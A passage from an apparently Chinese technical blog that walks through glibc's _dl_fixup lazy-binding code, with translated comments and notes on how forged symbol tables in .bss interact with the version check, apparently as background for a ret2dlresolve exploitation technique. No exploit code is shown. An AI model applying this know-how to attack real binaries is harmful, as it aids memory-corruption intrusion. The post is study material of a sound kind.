</span></span></span><span class="line"><span class="cl"><span class="cm"> first time each PLT entry is called. We must perform the relocation </span></span></span><span class="line"><span class="cl"><span class="cm"> specified in the PLT of the given shared object, and return the resolved </span></span></span><span class="line"><span class="cl"><span class="cm"> function address to the trampoline, which will restart the original call </span></span></span><span class="line"><span class="cl"><span class="cm"> to that address. Future calls will bounce directly from the PLT to the </span></span></span><span class="line"><span class="cl"><span class="cm"> function. */</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">DL_FIXUP_VALUE_TYPE</span> </span></span><span class="line"><span class="cl"><span class="n">attribute_hidden</span> <span class="nf">__attribute</span> <span class="p">((</span><span class="n">noinline</span><span class="p">))</span> <span class="n">ARCH_FIXUP_ATTRIBUTE</span> </span></span><span class="line"><span class="cl"><span class="nf">_dl_fixup</span> <span class="p">(</span> </span></span><span class="line"><span class="cl"><span class="cp"># ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS </span></span></span><span class="line"><span class="cl"> <span class="n">ELF_MACHINE_RUNTIME_FIXUP_ARGS</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="cp"># endif </span></span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">link_map</span> <span class="o">*</span><span class="n">l</span><span class="p">,</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Word</span><span class="p">)</span> <span class="n">reloc_arg</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Sym</span><span class="p">)</span> <span class="o">*</span><span class="k">const</span> <span class="n">symtab</span> </span></span><span class="line"><span class="cl"> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="n">DT_SYMTAB</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">strtab</span> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="n">DT_STRTAB</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="n">PLTREL</span> <span class="o">*</span><span class="k">const</span> <span class="n">reloc</span> </span></span><span class="line"><span class="cl"> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="p">(</span><span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="n">DT_JMPREL</span><span class="p">])</span> <span class="o">+</span> <span class="n">reloc_offset</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Sym</span><span class="p">)</span> <span class="o">*</span><span class="n">sym</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">symtab</span><span class="p">[</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">R_SYM</span><span class="p">)</span> <span class="p">(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)];</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Sym</span><span class="p">)</span> <span class="o">*</span><span class="n">refsym</span> <span class="o">=</span> <span class="n">sym</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="k">const</span> <span class="n">rel_addr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_addr</span> <span class="o">+</span> <span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_offset</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">lookup_t</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">DL_FIXUP_VALUE_TYPE</span> <span class="n">value</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Sanity check that we&#39;re really looking at a PLT relocation. */</span> </span></span><span class="line"><span class="cl"> <span class="nf">assert</span> <span class="p">(</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">R_TYPE</span><span class="p">)(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)</span> <span class="o">==</span> <span class="n">ELF_MACHINE_JMP_SLOT</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Look up the target symbol. If the normal lookup rules are not </span></span></span><span class="line"><span class="cl"><span class="cm"> used don&#39;t look in the global scope. */</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">__builtin_expect</span> <span class="p">(</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">ST_VISIBILITY</span><span class="p">)</span> <span class="p">(</span><span class="n">sym</span><span class="o">-&gt;</span><span class="n">st_other</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="k">struct</span> <span class="n">r_found_version</span> <span class="o">*</span><span class="n">version</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="nf">VERSYMIDX</span> <span class="p">(</span><span class="n">DT_VERSYM</span><span class="p">)]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Half</span><span class="p">)</span> <span class="o">*</span><span class="n">vernum</span> <span class="o">=</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="nf">VERSYMIDX</span> <span class="p">(</span><span class="n">DT_VERSYM</span><span class="p">)]);</span> </span></span><span class="line"><span class="cl"> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Half</span><span class="p">)</span> <span class="n">ndx</span> <span class="o">=</span> <span class="n">vernum</span><span class="p">[</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">R_SYM</span><span class="p">)</span> <span class="p">(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)]</span> <span class="o">&amp;</span> <span class="mh">0x7fff</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">version</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_versions</span><span class="p">[</span><span class="n">ndx</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">version</span><span class="o">-&gt;</span><span class="n">hash</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">version</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* We need to keep the scope around so do some locking. This is </span></span></span><span class="line"><span class="cl"><span class="cm"> not necessary for objects which cannot be unloaded or when </span></span></span><span class="line"><span class="cl"><span class="cm"> we are not using any threads (yet). */</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">DL_LOOKUP_ADD_DEPENDENCY</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">RTLD_SINGLE_THREAD_P</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">THREAD_GSCOPE_SET_FLAG</span> <span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">flags</span> <span class="o">|=</span> <span class="n">DL_LOOKUP_GSCOPE_LOCK</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#ifdef RTLD_ENABLE_FOREIGN_CALL </span></span></span><span class="line"><span class="cl"> <span class="n">RTLD_ENABLE_FOREIGN_CALL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="cp">#endif </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="nf">_dl_lookup_symbol_x</span> <span class="p">(</span><span class="n">strtab</span> <span class="o">+</span> <span class="n">sym</span><span class="o">-&gt;</span><span class="n">st_name</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sym</span><span class="p">,</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_scope</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">version</span><span class="p">,</span> <span class="n">ELF_RTYPE_CLASS_PLT</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* We are done with the global scope. */</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">RTLD_SINGLE_THREAD_P</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">THREAD_GSCOPE_RESET_FLAG</span> <span class="p">();</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#ifdef RTLD_FINALIZE_FOREIGN_CALL </span></span></span><span class="line"><span class="cl"> <span class="n">RTLD_FINALIZE_FOREIGN_CALL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="cp">#endif </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Currently result contains the base load address (or link map) </span></span></span><span class="line"><span class="cl"><span class="cm"> of the object that defines sym. Now add in the symbol </span></span></span><span class="line"><span class="cl"><span class="cm"> offset. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">DL_FIXUP_MAKE_VALUE</span> <span class="p">(</span><span class="n">result</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nf">SYMBOL_ADDRESS</span> <span class="p">(</span><span class="n">result</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="nb">false</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="cm">/* We already found the symbol. The module (and therefore its load </span></span></span><span class="line"><span class="cl"><span class="cm"> address) is also known. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">DL_FIXUP_MAKE_VALUE</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="nf">SYMBOL_ADDRESS</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="nb">true</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="n">l</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* And now perhaps the relocation addend. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">elf_machine_plt_value</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">reloc</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">sym</span> <span class="o">!=</span> <span class="nb">NULL</span> </span></span><span class="line"><span class="cl"> <span class="o">&amp;&amp;</span> <span class="nf">__builtin_expect</span> <span class="p">(</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">ST_TYPE</span><span class="p">)</span> <span class="p">(</span><span class="n">sym</span><span class="o">-&gt;</span><span class="n">st_info</span><span class="p">)</span> <span class="o">==</span> <span class="n">STT_GNU_IFUNC</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">elf_ifunc_invoke</span> <span class="p">(</span><span class="nf">DL_FIXUP_VALUE_ADDR</span> <span class="p">(</span><span class="n">value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Finally, fix up the plt itself. */</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">__glibc_unlikely</span> <span class="p">(</span><span class="nf">GLRO</span><span class="p">(</span><span class="n">dl_bind_not</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">value</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">elf_machine_fixup_plt</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">result</span><span class="p">,</span> <span class="n">refsym</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="n">reloc</span><span class="p">,</span> <span class="n">rel_addr</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="前置声明">前置声明 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cm">/* This function is called through a special trampoline from the PLT the </span></span></span><span class="line"><span class="cl"><span class="cm"> first time each PLT entry is called. We must perform the relocation </span></span></span><span class="line"><span class="cl"><span class="cm"> specified in the PLT of the given shared object, and return the resolved </span></span></span><span class="line"><span class="cl"><span class="cm"> function address to the trampoline, which will restart the original call </span></span></span><span class="line"><span class="cl"><span class="cm"> to that address. Future calls will bounce directly from the PLT to the </span></span></span><span class="line"><span class="cl"><span class="cm"> function. */</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">DL_FIXUP_VALUE_TYPE</span> </span></span><span class="line"><span class="cl"><span class="n">attribute_hidden</span> <span class="nf">__attribute</span> <span class="p">((</span><span class="n">noinline</span><span class="p">))</span> <span class="n">ARCH_FIXUP_ATTRIBUTE</span> </span></span><span class="line"><span class="cl"><span class="nf">_dl_fixup</span> <span class="p">(</span> </span></span><span class="line"><span class="cl"><span class="cp"># ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS </span></span></span><span class="line"><span class="cl"> <span class="n">ELF_MACHINE_RUNTIME_FIXUP_ARGS</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="cp"># endif </span></span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">link_map</span> <span class="o">*</span><span class="n">l</span><span class="p">,</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Word</span><span class="p">)</span> <span class="n">reloc_arg</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Sym</span><span class="p">)</span> <span class="o">*</span><span class="k">const</span> <span class="n">symtab</span> </span></span><span class="line"><span class="cl"> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="n">DT_SYMTAB</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">strtab</span> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="n">DT_STRTAB</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="n">PLTREL</span> <span class="o">*</span><span class="k">const</span> <span class="n">reloc</span> </span></span><span class="line"><span class="cl"> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="p">(</span><span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="n">DT_JMPREL</span><span class="p">])</span> <span class="o">+</span> <span class="n">reloc_offset</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Sym</span><span class="p">)</span> <span class="o">*</span><span class="n">sym</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">symtab</span><span class="p">[</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">R_SYM</span><span class="p">)</span> <span class="p">(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)];</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Sym</span><span class="p">)</span> <span class="o">*</span><span class="n">refsym</span> <span class="o">=</span> <span class="n">sym</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">void</span> <span class="o">*</span><span class="k">const</span> <span class="n">rel_addr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_addr</span> <span class="o">+</span> <span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_offset</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">lookup_t</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">DL_FIXUP_VALUE_TYPE</span> <span class="n">value</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p><strong>翻译:</strong> 这个函数是通过一个特殊的跳板(trampoline)从 PLT(过程链接表)中调用的,时机是每个 PLT 条目第一次被调用的时候。 我们必须按照给定共享对象(shared object)的 PLT 中指定的要求,执行重定位操作(relocation),并将解析出来的函数地址返回给那个跳板。 随后,跳板会重新向该地址发起原始的函数调用。 未来的调用将直接从 PLT 跳转到该函数(而不再经过这里)。</p> <p><code>ElfW(Word)</code> 为 <code>uint32_t</code> <code>PLTREL</code> 为 <code>Elf64_Rela</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp"># define D_PTR(map, i) (map)-&gt;i-&gt;d_un.d_ptr </span></span></span></code></pre></td></tr></table> </div> </div><p>整理一下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">symtab</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_SYMTAB</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> </span></span><span class="line"><span class="cl"><span class="kt">char</span> <span class="o">*</span><span class="n">strtab</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_STRTAB</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Rela</span> <span class="o">*</span><span class="n">reloc</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_JMPREL</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> <span class="o">+</span> <span class="n">reloc_arg</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">sym</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">symtab</span><span class="p">[(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">refsym</span> <span class="o">=</span> <span class="n">sym</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="n">rel_addr</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_addr</span> <span class="o">+</span> <span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_offset</span> </span></span><span class="line"><span class="cl"><span class="n">link_map</span> <span class="o">*</span><span class="n">result</span> </span></span><span class="line"><span class="cl"><span class="kt">uint64_t</span> <span class="n">value</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="版本校验">版本校验 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"> <span class="cm">/* Sanity check that we&#39;re really looking at a PLT relocation. */</span> </span></span><span class="line"><span class="cl"> <span class="nf">assert</span> <span class="p">(</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">R_TYPE</span><span class="p">)(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)</span> <span class="o">==</span> <span class="n">ELF_MACHINE_JMP_SLOT</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Look up the target symbol. If the normal lookup rules are not </span></span></span><span class="line"><span class="cl"><span class="cm"> used don&#39;t look in the global scope. */</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">__builtin_expect</span> <span class="p">(</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">ST_VISIBILITY</span><span class="p">)</span> <span class="p">(</span><span class="n">sym</span><span class="o">-&gt;</span><span class="n">st_other</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="k">struct</span> <span class="n">r_found_version</span> <span class="o">*</span><span class="n">version</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="nf">VERSYMIDX</span> <span class="p">(</span><span class="n">DT_VERSYM</span><span class="p">)]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Half</span><span class="p">)</span> <span class="o">*</span><span class="n">vernum</span> <span class="o">=</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="nf">D_PTR</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l_info</span><span class="p">[</span><span class="nf">VERSYMIDX</span> <span class="p">(</span><span class="n">DT_VERSYM</span><span class="p">)]);</span> </span></span><span class="line"><span class="cl"> <span class="nf">ElfW</span><span class="p">(</span><span class="n">Half</span><span class="p">)</span> <span class="n">ndx</span> <span class="o">=</span> <span class="n">vernum</span><span class="p">[</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">R_SYM</span><span class="p">)</span> <span class="p">(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)]</span> <span class="o">&amp;</span> <span class="mh">0x7fff</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">version</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_versions</span><span class="p">[</span><span class="n">ndx</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">version</span><span class="o">-&gt;</span><span class="n">hash</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">version</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* We need to keep the scope around so do some locking. This is </span></span></span><span class="line"><span class="cl"><span class="cm"> not necessary for objects which cannot be unloaded or when </span></span></span><span class="line"><span class="cl"><span class="cm"> we are not using any threads (yet). */</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">DL_LOOKUP_ADD_DEPENDENCY</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">RTLD_SINGLE_THREAD_P</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">THREAD_GSCOPE_SET_FLAG</span> <span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">flags</span> <span class="o">|=</span> <span class="n">DL_LOOKUP_GSCOPE_LOCK</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>首先要求 <code>reloc-&gt;r_info</code> 的低 4 字节为 7 ,不然报错</p> <p>若 <code>sym-&gt;st_other</code> 为 0 ,则进入 if 内部</p> <p>然后是一层检测,决定是否要进行<strong>版本校验(Version Check)</strong>,检查 <code>l_info[50]</code> 是否为 NULL ,正常情况下不为 NULL ,执行后面 if 内部代码</p> <p>但是进入 if 内部后在 64 位下会报错,因为在 <code>vernum[ELFW(R_SYM) (reloc-&gt;r_info)] &amp; 0x7fff</code> 的过程中,由于我们一般伪造的 symtab 位于 bss 段,导致在 64 位下 <code>reloc-&gt;r_info</code> 较大,发生段错误</p> <p>然后是锁相关操作</p> <h3 id="符号查找">符号查找 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" 